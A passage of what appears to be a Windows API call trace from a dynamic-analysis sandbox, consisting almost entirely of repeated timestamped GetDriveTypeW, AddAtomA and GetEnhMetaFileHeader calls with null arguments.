(lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.122] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0096.122] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.246] AddAtomA (lpString=0x0) returned 0x0 [0096.246] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) 
returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.247] AddAtomA (lpString=0x0) returned 0x0 [0096.247] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.248] AddAtomA (lpString=0x0) returned 0x0 [0096.248] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.248] AddAtomA (lpString=0x0) returned 0x0 [0096.248] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.248] AddAtomA (lpString=0x0) returned 0x0 [0096.248] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0096.248] AddAtomA (lpString=0x0) returned 0x0 [0096.248] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.248] AddAtomA (lpString=0x0) returned 0x0 [0096.248] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.248] AddAtomA (lpString=0x0) returned 0x0 [0096.248] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.248] AddAtomA (lpString=0x0) returned 0x0 [0096.248] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.248] AddAtomA (lpString=0x0) returned 0x0 [0096.248] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0096.248] AddAtomA (lpString=0x0) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 
0x0 [0096.249] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.250] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.251] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, 